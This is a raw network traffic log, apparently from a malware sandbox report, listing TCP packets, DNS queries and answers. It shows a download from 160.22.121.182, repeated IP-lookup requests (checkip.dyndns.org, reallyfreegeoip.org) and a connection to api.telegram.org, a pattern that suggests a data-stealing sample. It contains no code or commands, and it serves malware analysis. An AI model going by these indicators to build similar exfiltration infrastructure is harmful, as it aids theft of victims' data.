Jan 16, 2025 13:10:05.375149965 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375181913 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375190020 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.375214100 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375247002 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375255108 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.375278950 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375310898 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375324965 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.375375032 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375410080 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375415087 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.375443935 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.375485897 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.462322950 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462380886 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462415934 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462446928 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462481976 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462532997 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462565899 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462599039 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462647915 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462687969 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.462687969 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.462688923 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.462688923 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.462702990 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462735891 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462769032 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462788105 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462805033 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462835073 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.462836027 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462882996 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.462887049 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462938070 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.462946892 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.462970018 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463023901 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463023901 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463076115 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463109970 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463136911 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463160992 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463196993 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463231087 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463244915 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463279009 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463304043 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463345051 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463377953 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463402987 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463411093 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463444948 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463464022 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463476896 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463511944 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463534117 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463565111 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463618040 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463624001 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463650942 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463684082 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463700056 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463716030 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463749886 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463772058 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463783026 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463816881 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463844061 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463849068 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463881969 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463931084 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463951111 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.463963032 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.463979959 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464010954 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464042902 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464075089 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464081049 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464106083 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464107037 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464139938 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464171886 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464174986 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464206934 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464236021 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464238882 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464272022 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464303017 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464307070 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464335918 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464368105 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464369059 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464401960 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464433908 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464433908 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464468002 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464495897 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464500904 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464534044 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464565039 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464570045 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464596987 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464623928 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464629889 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464663029 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464689970 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464694977 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464730024 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464751959 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464761972 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464795113 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464826107 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464828968 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464875937 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464910030 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.464910030 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.464972019 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.467436075 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.472512007 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.472596884 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:28.882823944 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:28.887691975 CET	80	49852	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:28.887758970 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:28.888051987 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:28.892810106 CET	80	49852	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:29.513144016 CET	80	49852	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:29.521166086 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:29.525990009 CET	80	49852	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:29.706120968 CET	80	49852	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:29.760763884 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:29.832247972 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:29.832277060 CET	443	49858	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:29.832338095 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:29.858098984 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:29.858110905 CET	443	49858	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.317090988 CET	443	49858	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.317174911 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.320514917 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.320528984 CET	443	49858	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.320864916 CET	443	49858	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.370157003 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.379081011 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.423322916 CET	443	49858	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.489928961 CET	443	49858	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.489985943 CET	443	49858	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.490037918 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.496294022 CET	49858	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.499829054 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:30.504695892 CET	80	49852	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:30.685417891 CET	80	49852	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:30.687616110 CET	49864	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.687735081 CET	443	49864	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.687800884 CET	49864	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.688103914 CET	49864	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:30.688137054 CET	443	49864	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:30.729511976 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:31.142235994 CET	443	49864	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:31.144555092 CET	49864	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:31.144593954 CET	443	49864	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:31.291448116 CET	443	49864	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:31.291512012 CET	443	49864	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:31.291667938 CET	49864	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:31.292268038 CET	49864	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:31.295769930 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:31.297007084 CET	49870	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:31.300793886 CET	80	49852	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:31.300868988 CET	49852	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:31.301842928 CET	80	49870	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:31.301923037 CET	49870	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:31.301990986 CET	49870	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:31.307255030 CET	80	49870	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:31.962192059 CET	80	49870	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:31.963848114 CET	49872	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:31.963882923 CET	443	49872	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:31.963973045 CET	49872	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:31.964368105 CET	49872	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:31.964375019 CET	443	49872	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:32.010791063 CET	49870	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:32.425883055 CET	443	49872	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:32.427669048 CET	49872	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:32.427680016 CET	443	49872	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:32.576142073 CET	443	49872	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:32.576206923 CET	443	49872	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:32.576296091 CET	49872	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:32.576832056 CET	49872	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:32.581603050 CET	49877	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:32.586469889 CET	80	49877	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:32.586605072 CET	49877	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:32.586675882 CET	49877	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:32.591501951 CET	80	49877	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:33.212713957 CET	80	49877	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:33.214301109 CET	49883	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:33.214329958 CET	443	49883	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:33.214416027 CET	49883	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:33.214792967 CET	49883	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:33.214806080 CET	443	49883	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:33.260768890 CET	49877	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:33.677412033 CET	443	49883	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:33.678972960 CET	49883	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:33.679004908 CET	443	49883	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:33.804188013 CET	443	49883	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:33.804239988 CET	443	49883	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:33.804414988 CET	49883	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:33.804779053 CET	49883	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:33.808229923 CET	49877	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:33.809344053 CET	49889	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:33.813297033 CET	80	49877	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:33.813446999 CET	49877	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:33.814205885 CET	80	49889	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:33.814270973 CET	49889	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:33.814343929 CET	49889	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:33.819113016 CET	80	49889	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:34.457321882 CET	80	49889	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:34.458827019 CET	49895	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:34.458878994 CET	443	49895	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:34.458966017 CET	49895	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:34.459247112 CET	49895	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:34.459259987 CET	443	49895	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:34.510936975 CET	49889	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:34.912230015 CET	443	49895	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:34.914283991 CET	49895	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:34.914347887 CET	443	49895	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:35.039975882 CET	443	49895	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:35.040056944 CET	443	49895	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:35.040105104 CET	49895	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:35.040571928 CET	49895	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:35.044543028 CET	49889	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:35.045762062 CET	49899	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:35.049774885 CET	80	49889	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:35.049851894 CET	49889	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:35.050700903 CET	80	49899	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:35.050786972 CET	49899	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:35.050904036 CET	49899	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:35.055857897 CET	80	49899	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:35.757540941 CET	80	49899	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:35.758913994 CET	49904	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:35.758944988 CET	443	49904	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:35.759017944 CET	49904	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:35.759231091 CET	49904	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:35.759242058 CET	443	49904	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:35.807646036 CET	49899	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:36.212534904 CET	443	49904	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:36.214716911 CET	49904	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:36.214761972 CET	443	49904	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:36.372427940 CET	443	49904	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:36.372502089 CET	443	49904	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:36.372621059 CET	49904	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:36.373178959 CET	49904	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:36.377207041 CET	49899	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:36.378084898 CET	49908	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:36.382282019 CET	80	49899	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:36.383017063 CET	80	49908	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:36.383116007 CET	49899	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:36.383162022 CET	49908	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:36.383310080 CET	49908	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:36.388252020 CET	80	49908	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:37.013123989 CET	80	49908	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:37.014559984 CET	49914	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:37.014614105 CET	443	49914	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:37.014688969 CET	49914	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:37.015001059 CET	49914	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:37.015021086 CET	443	49914	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:37.057661057 CET	49908	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:37.474298000 CET	443	49914	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:37.476264000 CET	49914	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:37.476327896 CET	443	49914	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:37.620816946 CET	443	49914	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:37.620884895 CET	443	49914	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:37.620934963 CET	49914	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:37.621483088 CET	49914	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:37.625066042 CET	49908	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:37.626214981 CET	49920	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:37.630192041 CET	80	49908	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:37.630256891 CET	49908	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:37.631124020 CET	80	49920	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:37.631194115 CET	49920	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:37.631328106 CET	49920	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:37.636132002 CET	80	49920	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:38.267412901 CET	80	49920	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:38.269035101 CET	49926	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:38.269083023 CET	443	49926	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:38.269150019 CET	49926	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:38.271410942 CET	49926	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:38.271421909 CET	443	49926	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:38.307631016 CET	49920	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:38.766833067 CET	443	49926	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:38.783596992 CET	49926	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:38.783629894 CET	443	49926	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:38.921533108 CET	443	49926	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:38.921593904 CET	443	49926	104.21.48.1	192.168.2.6
Jan 16, 2025 13:10:38.921842098 CET	49926	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:38.922096014 CET	49926	443	192.168.2.6	104.21.48.1
Jan 16, 2025 13:10:44.139146090 CET	49920	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:44.144191980 CET	80	49920	193.122.6.168	192.168.2.6
Jan 16, 2025 13:10:44.144236088 CET	49920	80	192.168.2.6	193.122.6.168
Jan 16, 2025 13:10:44.147856951 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:10:44.147947073 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:44.148013115 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:10:44.148792028 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:10:44.148825884 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:44.781243086 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:44.781404972 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:10:44.783346891 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:10:44.783375025 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:44.783719063 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:44.785283089 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:10:44.827496052 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:44.827651978 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:10:44.827680111 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:45.409387112 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:45.409482002 CET	443	49962	149.154.167.220	192.168.2.6
Jan 16, 2025 13:10:45.409750938 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:10:45.410010099 CET	49962	443	192.168.2.6	149.154.167.220
Jan 16, 2025 13:11:36.955872059 CET	80	49870	193.122.6.168	192.168.2.6
Jan 16, 2025 13:11:36.955949068 CET	49870	80	192.168.2.6	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 13:10:28.869520903 CET	54484	53	192.168.2.6	1.1.1.1
Jan 16, 2025 13:10:28.876786947 CET	53	54484	1.1.1.1	192.168.2.6
Jan 16, 2025 13:10:29.814918041 CET	64503	53	192.168.2.6	1.1.1.1
Jan 16, 2025 13:10:29.822058916 CET	53	64503	1.1.1.1	192.168.2.6
Jan 16, 2025 13:10:44.140188932 CET	58639	53	192.168.2.6	1.1.1.1
Jan 16, 2025 13:10:44.147016048 CET	53	58639	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 13:10:28.869520903 CET	192.168.2.6	1.1.1.1	0x917d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:29.814918041 CET	192.168.2.6	1.1.1.1	0xaca1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:44.140188932 CET	192.168.2.6	1.1.1.1	0xabc7	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 13:10:28.876786947 CET	1.1.1.1	192.168.2.6	0x917d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 13:10:28.876786947 CET	1.1.1.1	192.168.2.6	0x917d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:28.876786947 CET	1.1.1.1	192.168.2.6	0x917d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
